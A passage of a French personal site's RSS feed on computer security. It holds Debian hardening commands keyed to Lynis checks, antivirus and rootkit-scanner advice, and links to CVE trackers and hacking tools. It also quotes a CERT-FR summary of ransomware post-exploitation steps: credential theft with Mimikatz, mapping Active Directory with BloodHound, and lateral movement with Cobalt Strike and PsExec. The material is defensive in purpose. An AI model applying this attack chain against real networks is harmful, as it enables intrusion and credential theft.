&lt;div class=&#034;precode&#034;&gt;&lt;pre class='spip_code spip_code_block' dir='ltr' style='text-align:left;'&gt;&lt;code&gt;echo lynix; apt-get install libpam-tmpdir apt-listbugs apt-listchanges needrestart debsecan debsums chmod o-rwx /etc/sudoers.d chmod -R o-rwx /home/* cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local sed 's/#\(\* *soft *core *0\)/\1/' -i /etc/security/limits.conf # core dumps https://cisofy.com/lynis/controls/KRNL-5820/ sed &#034;s/^\(UMASK[\t ]*\)022/\1027/&#034; -i /etc/login.defs # Default umask in /etc/login.defs could be more strict like 027 [AUTH-9328] https://cisofy.com/lynis/controls/AUTH-9328/ apt-get install sysstat #Enable sysstat to collect accounting (no results) [ACCT-9626] https://cisofy.com/lynis/controls/ACCT-9626/ apt-get install auditd #Enable auditd to collect audit information [ACCT-9628] https://cisofy.com/lynis/controls/ACCT-9628/ apt-get install tripwire samhain # Install a file integrity tool to monitor changes to critical and sensitive files [FINT-4350] https://cisofy.com/lynis/controls/FINT-4350/ apt-get install puppet #Determine if automation tools are present for system management [TOOL-5002] https://cisofy.com/lynis/controls/TOOL-5002/ &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 class=&#034;spip&#034;&gt;les bugs/CVE/vuln&#233;rabilit&#233;/&lt;/h2&gt;
&lt;p&gt;&lt;a href=&#034;https://security-tracker.debian.org/tracker/&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;https://security-tracker.debian.org/tracker/&lt;/a&gt;&lt;br class='autobr' /&gt;
&lt;a href=&#034;https://www.cvedetails.com/vulnerability-list/vendor_id-358/Webmin.html&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;https://www.cvedetails.com/vulnerability-list/vendor_id-358/Webmin.html&lt;/a&gt;&lt;br class='autobr' /&gt;
&lt;a href=&#034;https://cve.mitre.org/cgi-bin/cvename.cgi?name=2025-39735&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;https://cve.mitre.org/cgi-bin/cvename.cgi?name=2025-39735&lt;/a&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;logiciels&lt;/h2&gt;
&lt;p&gt;&lt;a href=&#034;https://hackingvision.com/category/hacking-tools/&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;https://hackingvision.com/category/hacking-tools/&lt;/a&gt;&lt;br class='autobr' /&gt;
&lt;a href=&#034;https://www.metasploit.com/&#034; class=&#034;spip_out&#034; rel=&#034;external&#034;&gt;metasploit&lt;/a&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;logiciels ran&#231;ongiciels d'apr&#232;s CERTFR-2021-CTI-001.pdf&lt;/h2&gt;&lt;ul class=&#034;spip&#034; role=&#034;list&#034;&gt;&lt;li&gt; &lt;a href=&#034;https://github.com/gentilkiwi/mimikatz&#034; class=&#034;spip_out&#034; rel=&#034;external&#034;&gt;mimikatz&lt;/a&gt;
&lt;ul class=&#034;spip&#034; role=&#034;list&#034;&gt;&lt;li&gt; &lt;a href=&#034;https://www.varonis.com/fr/blog/mimikatz-kezako&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;https://www.varonis.com/fr/blog/mimikatz-kezako&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;La phase de post-exploitation d'une attaque par ran&#231;ongiciel se d&#233;roule g&#233;n&#233;ralement de la mani&#232;re suivante [35] :&lt;br class='autobr' /&gt;
&#8226; pour &#233;lever leurs privil&#232;ges au sein du SI, les attaquants peuvent :&lt;br class='autobr' /&gt;
&#8211; proc&#233;der &#224; des attaques par force brute ;&lt;br class='autobr' /&gt;
&#8211; exploiter des vuln&#233;rabilit&#233;s logicielles, par exemple du type ZeroLogon (cas de Ryuk [29]) ou d'autres&lt;br class='autobr' /&gt;
types de CVE ;&lt;br class='autobr' /&gt;
&#8211; utiliser des outils de tests d'intrusion tels que Mimikatz, Mimidogs, Mimikittenz [36], Windows Credentials editor, Rubeus [37] et LaZagne [16], afin de r&#233;cup&#233;rer des identifiants l&#233;gitimes.&lt;br class='autobr' /&gt;
&#8226; pour effectuer la cartographie de l'Active Directory (AD), les attaquants utilisent g&#233;n&#233;ralement les outils de&lt;br class='autobr' /&gt;
tests d'intrusion BloodHound, SharpHound ou ADFind [38].&lt;br class='autobr' /&gt;
&#8226; pour se lat&#233;raliser, les attaquants peuvent utiliser les outils de tests d'intrusion Cobalt Strike, Metasploit,&lt;br class='autobr' /&gt;
Powershell Empire, Koadic ou encore CrackMapExec (cas par exemple de LockBit [39]) mais aussi utiliser&lt;br class='autobr' /&gt;
abusivement des outils Windows tels que WMI [35], WinRM [16] et PsExec [35].&lt;br class='autobr' /&gt;
&#8226; pour d&#233;ployer le ran&#231;ongiciel, les attaquants utilisent par exemple un loader, PsExec [16] ou encore des t&#226;ches&lt;br class='autobr' /&gt;
planifi&#233;es d&#233;ploy&#233;es par GPO (Group Policy Objects).&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;sites&lt;/h2&gt;
&lt;p&gt;&lt;a href=&#034;https://www.ssi.gouv.fr/particulier/logiciels-preconises-par-lanssi-2/&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;https://www.ssi.gouv.fr/particulier/logiciels-preconises-par-lanssi-2/&lt;/a&gt;&lt;br class='autobr' /&gt;
&lt;a href=&#034;https://docs.clip-os.org/&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;https://docs.clip-os.org/&lt;/a&gt;&lt;br class='autobr' /&gt;
&lt;a href=&#034;https://www.cvedetails.com/&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;https://www.cvedetails.com/&lt;/a&gt;&lt;br class='autobr' /&gt;
&lt;a href=&#034;https://security-tracker.debian.org/tracker/CVE-2024-3094&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;https://security-tracker.debian.org/tracker/CVE-2024-3094&lt;/a&gt;&lt;br class='autobr' /&gt;
outils de d&#233;cryptage : &lt;a href=&#034;https://www.nomoreransom.org/en/decryption-tools.html&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;https://www.nomoreransom.org/en/decryption-tools.html&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
		
		</content:encoded>


		
		<enclosure url="https://dindoun.lautre.net/IMG/pdf/certfr-2021-cti-001.pdf" length="1447422" type="application/pdf" />
		

	</item>
<item xml:lang="fr">
		<title>se pr&#233;munir contre virus, trojan ...</title>
		<link>https://dindoun.lautre.net/spip.php?article95</link>
		<guid isPermaLink="true">https://dindoun.lautre.net/spip.php?article95</guid>
		<dc:date>2017-03-18T00:07:51Z</dc:date>
		<dc:format>text/html</dc:format>
		<dc:language>fr</dc:language>
		<dc:creator>bruno</dc:creator>


		<dc:subject>s&#233;curit&#233; informatique</dc:subject>

		<description>
&lt;p&gt;Rien n'est &#233;vident ici. Certains programmes &#224; installer feront le boulot tout seul : installer fail2ban - bannit des h&#244;tes qui provoquent plusieurs erreurs d'authentification &lt;br class='autobr' /&gt;
antivirus, utile pour v&#233;rifier des windobe : clamav clamav-freshclam freshclam &amp;&amp; clamscan -r -i -v DOSSIERouFICHIER &lt;br class='autobr' /&gt;
integrit - V&#233;rificateur de l'int&#233;grit&#233; des fichiers chkrootkit - D&#233;tecteur de rootkit rkhunter - scanner de rootkit, porte d&#233;rob&#233;e, renifleur et exploit &lt;br class='autobr' /&gt;
antivirus : (&#8230;)&lt;/p&gt;


-
&lt;a href="https://dindoun.lautre.net/spip.php?rubrique47" rel="directory"&gt;&#034;s&#233;curit&#233;&#034; informatique&lt;/a&gt;

/ 
&lt;a href="https://dindoun.lautre.net/spip.php?mot172" rel="tag"&gt;s&#233;curit&#233; informatique&lt;/a&gt;

		</description>


 <content:encoded>&lt;img src='https://dindoun.lautre.net/local/cache-vignettes/L100xH100/arton95-2b017.png?1762304773' class='spip_logo spip_logo_right' width='100' height='100' alt=&#034;&#034; /&gt;
		&lt;div class='rss_texte'&gt;&lt;p&gt;Rien n'est &#233;vident ici.&lt;br class='autobr' /&gt;
Certains programmes &#224; installer feront le boulot tout seul : &lt;br class='autobr' /&gt;
installer &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;fail2ban&lt;/code&gt; - bannit des h&#244;tes qui provoquent plusieurs erreurs d'authentification&lt;/p&gt;
&lt;p&gt;antivirus, utile pour v&#233;rifier des windobe : &lt;code class='spip_code spip_code_inline' dir='ltr'&gt;clamav clamav-freshclam&lt;/code&gt;&lt;/p&gt; &lt;textarea readonly='readonly' cols='40' rows='2' class='spip_cadre spip_cadre_block' dir='ltr'&gt;freshclam &amp;&amp; clamscan -r -i -v DOSSIERouFICHIER&lt;/textarea&gt;
&lt;p&gt;&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;integrit&lt;/code&gt; - V&#233;rificateur de l'int&#233;grit&#233; des fichiers&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;chkrootkit&lt;/code&gt; - D&#233;tecteur de rootkit&lt;br class='autobr' /&gt;
&lt;code class='spip_code spip_code_inline' dir='ltr'&gt;rkhunter&lt;/code&gt; - scanner de rootkit, porte d&#233;rob&#233;e, renifleur et exploit&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;antivirus : &lt;/h2&gt;
&lt;p&gt;&lt;a href=&#034;https://www.av-test.org/fr/nouvelles/news-single-view/linux-test-de-16-suites-de-protection-contre-les-programmes-malveillants-specifiques-a-windows-e/&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;https://www.av-test.org/fr/nouvelles/news-single-view/linux-test-de-16-suites-de-protection-contre-les-programmes-malveillants-specifiques-a-windows-e/&lt;/a&gt; : &lt;br class='autobr' /&gt;
AVG Server Edition for Linux 2013 et ESET NOD32 AV for Linux Desktop&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;programmes obsol&#232;tes&lt;/h2&gt;
&lt;p&gt;&lt;a href=&#034;http://cert.ssi.gouv.fr/site/CERTA-2005-INF-003/index.html&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;http://cert.ssi.gouv.fr/site/CERTA-2005-INF-003/index.html&lt;/a&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;certificats https&lt;/h2&gt;
&lt;p&gt;&lt;a href=&#034;http://www.cert.ssi.gouv.fr/site/CERTFR-2015-ACT-004/index.html&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;http://www.cert.ssi.gouv.fr/site/CERTFR-2015-ACT-004/index.html&lt;/a&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;recommandations mots de passe&lt;/h2&gt;
&lt;p&gt;&lt;a href=&#034;http://cert.ssi.gouv.fr/site/CERTA-2005-INF-001/index.html&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;http://cert.ssi.gouv.fr/site/CERTA-2005-INF-001/index.html&lt;/a&gt;&lt;/p&gt;
&lt;h2 class=&#034;spip&#034;&gt;comment t&#233;l&#233;charger un programme&lt;/h2&gt;&lt;ul class=&#034;spip&#034; role=&#034;list&#034;&gt;&lt;li&gt; la m&#233;thode windows ne doit pas &#234;tre utilis&#233;e sur linux : toujours pr&#233;f&#233;rer apt-get ou synaptic ou l'&#233;quivalent, d&#233;j&#224; pr&#233;sent sur votre ordinateur.&lt;/li&gt;&lt;li&gt; sur windows , peu de sites sont sures : ublock doit &#234;tre install&#233; sur votre firefox, il vous aidera &#224; faire le tri.
&lt;ul class=&#034;spip&#034; role=&#034;list&#034;&gt;&lt;li&gt; liste non exhaustive de sites dangereux d'apr&#232;s ublock/emisoft (&lt;a href=&#034;http://blog.emsisoft.com/2015/03/11/mind-the-pup-top-download-portals-to-avoid/&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;http://blog.emsisoft.com/2015/03/11/mind-the-pup-top-download-portals-to-avoid/&lt;/a&gt; , &lt;a href=&#034;https://www.howtogeek.com/207692/yes-every-freeware-download-site-is-serving-crapware-heres-the-proof/&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;https://www.howtogeek.com/207692/yes-every-freeware-download-site-is-serving-crapware-heres-the-proof/&lt;/a&gt; ) car ces sites t&#233;l&#233;chargent des virus/malware en plus du programme voulu : Download.com, Filehippo, Snapfiles, Softonic, Softpedia, Tucows, SourceForge, Filehorse, Software Informer, Soft32&lt;/li&gt;&lt;li&gt; par la suite il faudra essayer comme site &lt;a href=&#034;http://www.majorgeeks.com/&#034; class=&#034;spip_url spip_out auto&#034; rel=&#034;nofollow external&#034;&gt;http://www.majorgeeks.com/&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;
		
		</content:encoded>


		

	</item>



</channel>

</rss>
